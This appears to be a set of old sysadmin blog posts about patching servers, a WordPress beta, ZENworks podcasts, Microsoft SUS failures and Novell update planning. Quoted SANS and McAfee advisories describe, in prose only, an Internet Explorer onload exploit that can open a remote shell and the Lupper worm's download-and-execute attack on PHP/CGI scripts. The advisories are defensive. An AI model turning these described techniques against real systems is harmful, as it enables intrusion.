Back from BrainShare and the usual round of patching the internal boxes.

The firewall/spam server got a good round of updates. IPcop had two major updates. Also the CLAM anti-virus for the mail sweeper got updated to 0.90.1

There are also a stack of SLES 10 and Windows 2003 updates to test and install. Sigh. Windows 2003 SP2 is now live; I need to check it doesn’t make anything barf. SLES 10 just has the normal slew of packages.

WordPress 2.1 beta 1

Hot on the heels of WordPress 2.0.6 release candidate – is WordPress 2.1 beta 1.

I tried the alpha from subversion on this blog a while ago; it looked promising. Now we are at beta 1.

You can get the beta from here; knowing the test and release team – it will be live in weeks.

ZENworks Podcasts

I recorded a series of podcasts today for the new Novell Communities site.

Usual delays – see posts below – but should be up and posted in mid-February.

Topics for discussion: ZENworks 7, ZENworks Asset Management, Patching and BrainShare 2006.


Internet Explorer – another unpatched vulnerability

SANS are flagging a particularly nasty Internet Explorer problem:

the UK group “Computer Terrorism” released a proof of concept exploit against patched versions of Internet Explorer. We verified that the code is working on a fully patched Windows XP system with default configuration.

The bug uses a problem in the javascript ‘Window()’ function, if run from ‘onload’. ‘onload’ is an argument to the HTML tag, and is used to execute javascript as the page loads.

The Javascript Window() vulnerability has been known for a few months now, but it has so far been treated as a denial of service (DoS) vulnerability. The author of this PoC figured out a way to use this older vulnerability to execute code.

Arbitrary executables may be executed without user interaction. The PoC demo as tested by us will launch the calculator (calc.exe).

In addition ot the PoC ‘Calculator’ exploit, a reader (thanks Chris R!) submitted a version that opens a remote shell. The PoC exploit allows for easy copy/paste of various shell code snippets.

In itself, the vulnerability will not escalate privileges. We are trying to verify other exploits at this point.

Turn off javascript, or use an alternative browser (Opera, Firefox). If you happen to use Firefox: This bug is not affecting firefox. But others may. For firefox, the extnion ‘noscript’ can be used to easily allow Javascript for selected sites only.

Looks nasty. Fully patched Windows XP and IE 6 is at risk from this one; turning off javascript is going to break a lot of new sites..

As the man said – make sure you use Firefox or Opera.

Microsoft SUS failures?

It’s another big patch week – and SANS are reporting that Microsoft SUS is having problems:

Microsoft SUS not playing well (NEW)
Published: 2005-11-09,
Last Updated: 2005-11-09 16:45:28 UTC by Tony Carothers (Version: 2(click to highlight changes))

Matthew Bailey just provided this input in regards to the SUS problems that are occuring

“I found this posting at

The SUS 1.0 update cab is delayed today but will be published at ~ 5:00pm PDT today.

The WSUS cab has no delays and has been published.”

We’ve had a busy last ~12 hours. Reports are coming in that Microsoft’s SUS is not updating correctly, causing a lot of readers to have to manually roll out patches. If anybody has found this to not be the case, or found a way to kick SUS into gear, please send us a note, and I’ll get it out to the rest of the world 🙂

Most enterprises who are relying on SUS/WSUS for deployment of patches are still on SUS (the older technology). This is a pretty important process for enterprises – patching, and the race to patch on time, is causing a lot of IT administrator headaches.

For SUS to fail and administrators to have to manually roll out patches is a disaster; I am sure that after this many CIOs will mandate a close look at other options; maybe this will cause them to switch platforms, or at least look at a more robust patch solution.

Lupper – Linux worm

ZDNet and others are flagging a new Linux worm.

Quoting McAfee:

The worm blindly attacks web servers by sending malicious http requests on port 80. If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed.

There are some well understood methods to minimise this risk.

Practice good security. A good robust perimeter firewall – I use IPcop; along with a good patch regime is vital. I (naturally) use ZENworks Linux Management to keep my Linux servers up to date.

One other addition is application hardening – I blogged a while ago about Novell AppArmor – I run this on my outward facing and internal Linux servers. If anything untoward happens – AppArmor is my final line of defence keeping my servers in good health.

[Edit – also to note – keep your applications themselves up to date; if they are RPM based – ZENworks Linux Management can deliver the updates. My blogging software is WordPress – they posted a note saying the updated versions are not affected.]

Novell patching

I seem to have won the task of writing a short paper on ‘how to update and patch Novell systems in the enterprise’.

I’m working on this in conjunction with my ZENworks 7 Linux Management white paper – which is still being written. (Sorry it’s late – I’m on the road again!)

My summary so far is:

NetWare – use ZENworks Server Management. Deploy CPKs of the Consolidated Support Pack
SLES 8 – use ZENworks Linux Management. Mirror content from a YaST Online Update mirror.
SLES 9 – use ZENworks Linux Management. Mirror content from Note: Make sure you have migrated your SUSE portal account!
NLD 9 – as SLES 9
RHEL – use ZENworks Linux Management. I know it’s not a Novell product – but mirror content from Red Hat Network using your RHN credentials.

There are probably some other platforms I need to add here – small biz server and some applications spring to mind – but I’ll be working off this list.

Comments welcome.